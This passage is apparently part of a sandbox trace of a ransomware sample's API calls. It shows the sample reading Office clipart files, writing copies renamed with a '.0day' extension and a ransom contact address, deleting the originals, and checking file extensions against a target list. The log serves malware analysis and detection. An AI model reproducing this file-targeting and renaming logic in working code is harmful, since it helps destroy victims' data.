lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xc190, lpOverlapped=0x0) returned 1 [0272.407] ReadFile (in: hFile=0x3a8, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.407] WriteFile (in: hFile=0x390, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.407] SetEndOfFile (hFile=0x390) returned 1 [0272.407] CloseHandle (hObject=0x390) returned 1 [0272.407] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.408] SetEndOfFile (hFile=0x3a8) returned 1 [0272.412] CloseHandle (hObject=0x3a8) returned 1 [0272.412] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.421] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf")) returned 1 [0272.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0272.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0272.421] lstrlenW (lpString=".doc") returned 4 [0272.421] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.421] lstrlenW (lpString=".docx") returned 5 [0272.421] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0272.421] lstrlenW (lpString=".pdf") returned 4 [0272.421] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.421] lstrlenW (lpString=".xls") returned 4 [0272.421] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.421] lstrlenW (lpString=".xlsx") returned 5 [0272.421] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0272.421] lstrlenW (lpString=".ppt") returned 4 [0272.421] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0272.421] lstrlenW (lpString=".zip") returned 4 [0272.421] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.421] lstrlenW (lpString=".rar") returned 4 [0272.422] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.422] lstrlenW (lpString=".bz2") returned 4 [0272.422] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.422] lstrlenW (lpString=".7z") returned 3 [0272.422] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0272.422] lstrlenW (lpString=".dbf") returned 4 [0272.422] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0272.422] lstrlenW (lpString=".1cd") returned 4 [0272.422] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0272.422] lstrlenW (lpString=".jpg") returned 4 [0272.422] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0272.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0272.422] lstrlenW (lpString=".doc") returned 4 [0272.422] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.422] lstrlenW (lpString=".docx") returned 5 [0272.422] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0272.422] lstrlenW (lpString=".pdf") returned 4 [0272.422] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.422] lstrlenW (lpString=".xls") returned 4 [0272.422] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.422] lstrlenW (lpString=".xlsx") returned 5 [0272.422] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0272.422] lstrlenW (lpString=".ppt") returned 4 [0272.422] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0272.422] lstrlenW (lpString=".zip") returned 4 [0272.422] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.422] lstrlenW (lpString=".rar") returned 4 [0272.422] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.422] lstrlenW (lpString=".bz2") returned 4 [0272.423] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.423] lstrlenW (lpString=".7z") returned 3 [0272.423] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0272.423] lstrlenW (lpString=".dbf") returned 4 [0272.423] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0272.423] lstrlenW (lpString=".1cd") returned 4 [0272.423] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63 [0272.423] lstrlenW (lpString=".jpg") returned 4 [0272.423] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.423] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.423] lstrlenW (lpString="DD00117_.WMF") returned 12 [0272.423] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.438] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=31122) returned 1 [0272.438] CloseHandle (hObject=0x39c) returned 1 [0272.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf")) returned 0x20 [0272.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.438] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.438] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0272.438] GetLastError () returned 0x0 [0272.439] ReadFile (in: hFile=0x39c, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x7992, lpOverlapped=0x0) returned 1 [0272.442] WriteFile (in: hFile=0x318, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x79a0, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x79a0, lpOverlapped=0x0) returned 1 [0272.443] ReadFile (in: hFile=0x39c, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.444] WriteFile (in: hFile=0x318, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.444] SetEndOfFile (hFile=0x318) returned 1 [0272.444] CloseHandle (hObject=0x318) returned 1 [0272.444] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.444] SetEndOfFile (hFile=0x39c) returned 1 [0272.450] CloseHandle (hObject=0x39c) returned 1 [0272.450] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.450] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf")) returned 1 [0272.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0272.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0272.450] lstrlenW (lpString=".doc") returned 4 [0272.450] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.450] lstrlenW (lpString=".docx") returned 5 [0272.450] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.450] lstrlenW (lpString=".pdf") returned 4 [0272.450] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.450] lstrlenW (lpString=".xls") returned 4 [0272.450] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.450] lstrlenW (lpString=".xlsx") returned 5 [0272.450] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.450] lstrlenW (lpString=".ppt") returned 4 [0272.450] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0272.450] lstrlenW (lpString=".zip") returned 4 [0272.451] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.451] lstrlenW (lpString=".rar") returned 4 [0272.451] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.451] lstrlenW (lpString=".bz2") returned 4 [0272.451] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.451] lstrlenW (lpString=".7z") returned 3 [0272.451] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0272.451] lstrlenW (lpString=".dbf") returned 4 [0272.451] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0272.451] lstrlenW (lpString=".1cd") returned 4 [0272.451] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0272.451] lstrlenW (lpString=".jpg") returned 4 [0272.451] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0272.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0272.451] lstrlenW (lpString=".doc") returned 4 [0272.451] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.451] lstrlenW (lpString=".docx") returned 5 [0272.451] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.451] lstrlenW (lpString=".pdf") returned 4 [0272.451] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.451] lstrlenW (lpString=".xls") returned 4 [0272.451] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.451] lstrlenW (lpString=".xlsx") returned 5 [0272.451] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.451] lstrlenW (lpString=".ppt") returned 4 [0272.451] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0272.451] lstrlenW (lpString=".zip") returned 4 [0272.452] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.452] lstrlenW (lpString=".rar") returned 4 [0272.452] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.452] lstrlenW (lpString=".bz2") returned 4 [0272.452] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.452] lstrlenW (lpString=".7z") returned 3 [0272.452] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0272.452] lstrlenW (lpString=".dbf") returned 4 [0272.452] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0272.452] lstrlenW (lpString=".1cd") returned 4 [0272.452] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0272.452] lstrlenW (lpString=".jpg") returned 4 [0272.452] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.452] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.452] lstrlenW (lpString="DD00121_.WMF") returned 12 [0272.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.454] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=8256) returned 1 [0272.454] CloseHandle (hObject=0x394) returned 1 [0272.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf")) returned 0x20 [0272.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.455] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.455] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0272.455] GetLastError () returned 0x0 [0272.455] ReadFile (in: hFile=0x394, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x2040, lpOverlapped=0x0) returned 1 [0272.459] WriteFile (in: hFile=0x318, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x2050, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x2050, lpOverlapped=0x0) returned 1 [0272.460] ReadFile (in: hFile=0x394, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.460] WriteFile (in: hFile=0x318, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.460] SetEndOfFile (hFile=0x318) returned 1 [0272.460] CloseHandle (hObject=0x318) returned 1 [0272.460] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.460] SetEndOfFile (hFile=0x394) returned 1 [0272.972] CloseHandle (hObject=0x394) returned 1 [0272.972] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.038] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf")) returned 1 [0273.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0273.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0273.068] lstrlenW (lpString=".doc") returned 4 [0273.068] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.068] lstrlenW (lpString=".docx") returned 5 [0273.068] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.068] lstrlenW (lpString=".pdf") returned 4 [0273.068] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.068] lstrlenW (lpString=".xls") returned 4 [0273.068] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.068] lstrlenW (lpString=".xlsx") returned 5 [0273.068] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.068] lstrlenW (lpString=".ppt") returned 4 [0273.068] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0273.068] lstrlenW (lpString=".zip") returned 4 [0273.068] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.068] lstrlenW (lpString=".rar") returned 4 [0273.068] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.068] lstrlenW (lpString=".bz2") returned 4 [0273.068] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.068] lstrlenW (lpString=".7z") returned 3 [0273.068] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0273.069] lstrlenW (lpString=".dbf") returned 4 [0273.069] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0273.069] lstrlenW (lpString=".1cd") returned 4 [0273.069] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0273.069] lstrlenW (lpString=".jpg") returned 4 [0273.069] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0273.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0273.069] lstrlenW (lpString=".doc") returned 4 [0273.069] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.069] lstrlenW (lpString=".docx") returned 5 [0273.069] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.069] lstrlenW (lpString=".pdf") returned 4 [0273.069] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.069] lstrlenW (lpString=".xls") returned 4 [0273.069] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.069] lstrlenW (lpString=".xlsx") returned 5 [0273.069] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.069] lstrlenW (lpString=".ppt") returned 4 [0273.069] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0273.069] lstrlenW (lpString=".zip") returned 4 [0273.069] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.069] lstrlenW (lpString=".rar") returned 4 [0273.069] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.069] lstrlenW (lpString=".bz2") returned 4 [0273.069] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.069] lstrlenW (lpString=".7z") returned 3 [0273.069] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0273.069] lstrlenW (lpString=".dbf") returned 4 [0273.069] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0273.069] lstrlenW (lpString=".1cd") returned 4 [0273.070] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0273.070] lstrlenW (lpString=".jpg") returned 4 [0273.070] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.070] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.070] lstrlenW (lpString="DD00414_.WMF") returned 12 [0273.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.070] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=42908) returned 1 [0273.070] CloseHandle (hObject=0x37c) returned 1 [0273.071] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf")) returned 0x20 [0273.071] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.071] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.071] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0273.072] GetLastError () returned 0x0 [0273.072] ReadFile (in: hFile=0x37c, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0xa79c, lpOverlapped=0x0) returned 1 [0273.117] WriteFile (in: hFile=0x390, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xa7a0, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xa7a0, lpOverlapped=0x0) returned 1 [0273.118] ReadFile (in: hFile=0x37c, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.118] WriteFile (in: hFile=0x390, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.118] SetEndOfFile (hFile=0x390) returned 1 [0273.118] CloseHandle 